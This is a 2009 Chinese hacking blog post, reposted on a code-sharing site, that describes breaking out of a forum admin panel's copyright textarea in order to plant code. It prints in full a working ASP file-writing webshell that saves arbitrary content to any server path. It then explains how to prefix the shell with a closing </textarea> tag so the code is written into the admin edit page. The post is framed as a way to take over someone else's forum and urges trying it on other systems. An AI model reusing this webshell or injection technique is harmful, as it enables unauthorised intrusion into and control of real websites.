当前位置: 代码网 > 服务器>网络安全>企业安全 > 编辑器代码逃逸漏洞 by蚊虫原创

编辑器代码逃逸漏洞 by蚊虫原创

2009年09月29日 企业安全 我要评论
编辑器代码逃逸漏洞 by蚊虫原创几天 冰刀丢给我一个论坛 这几天无聊 随便看看 看看能不能拿到webshell... 09-09-29

好 版权信息 把他变成小马

成功保存

但是没有被执行..

应该是马的问题

马儿不行 当然是更换了 这不 怪事出现了 你看..

看 命令成功完成! 非法操作!       这这么跑出来了?????????????

真是怪了难道我的马儿真的长褪了?

研究了一下中以明白是怎么回事了..

看看我的马儿的代码,注意红色的标记
<body>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(request.servervariables("script_name")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊虫专用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objfso
dim fdat
dim objcountfile
on error resume next
set objfso = server.createobject("scripting.filesystemobject")
if trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
set objcountfile=objfso.createtextfile(request("syfdpath"),true)
objcountfile.write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objcountfile.close
set objcountfile=nothing
set objfso = nothing
%>
</form>

再看看网页的源代码,注意橙色的标记

<td width="50%" class="td1"> <u>论坛版权信息</u></td>
<td width="50%" class="td1" valign=top>
<textarea name="copyright" cols="50" rows="5" id=tdcopyright>

<style>
body{
filter:progid:dximagetransform.microsoft.gradient(gradienttype=0,startcolorstr=#808080,endcolorstr=#000);
color:#fff;
font-size:9pt
}
</style>
<body>
<p> </p>
<p> </p>
<form method=post>
<input type=text name=syfdpath value="<%=replace(server.mappath(request.servervariables("script_name")),".","sb.") %>" size="53">
<input type=submit value=保存>&nbsp;&nbsp; 蚊虫专用
<textarea name=cyfddata rows="11" cols="90"></textarea>
<%
dim objfso
dim fdat
dim objcountfile
on error resume next
set objfso = server.createobject("scripting.filesystemobject")
if trim(request("syfdpath"))<>"" then
fdata = request("cyfddata")
set objcountfile=objfso.createtextfile(request("syfdpath"),true)
objcountfile.write fdata
if err =0 then %>
<p>命令成功完成!
<% else %>
非法操作!
<%
end if
err.clear
end if
objcountfile.close
set objcountfile=nothing
set objfso = nothing
%>
</form></textarea>
<a href="javascript:admin_size(-5,'tdcopyright')">

看不明白?

我来解释一下

看网页的源代码

<textarea name="copyright" cols="50" rows="5" id=tdcopyright>

这是文本框的开头标记

尔我的小马里面又有一个文本框结束的标记

<textarea name=cyfddata rows="11" cols="90"></textarea>

所以浏览器就把

</textarea>以下的代码解释为文本框以外的位置了...

呵呵 这就相当于把 </textarea>以下的代码 写进了这个编辑页面里面...

明白了吧

这对我们很有用处

使用

在小马最上面加上</textarea>

保存

然后重新编辑

这时 我们的小马已经被'写入"编辑页面

剩下的就不用说了吧.....哈哈 淫荡去咯....

ps:不光是动网 还有其他的系统都有类似的漏洞

ps:不要吧思维光死停留在这里..想想我们可以.....

ps:有可能运行不了,这取决于你的马.

(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
最近更新的文章
推荐阅读
大家感兴趣的文章
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com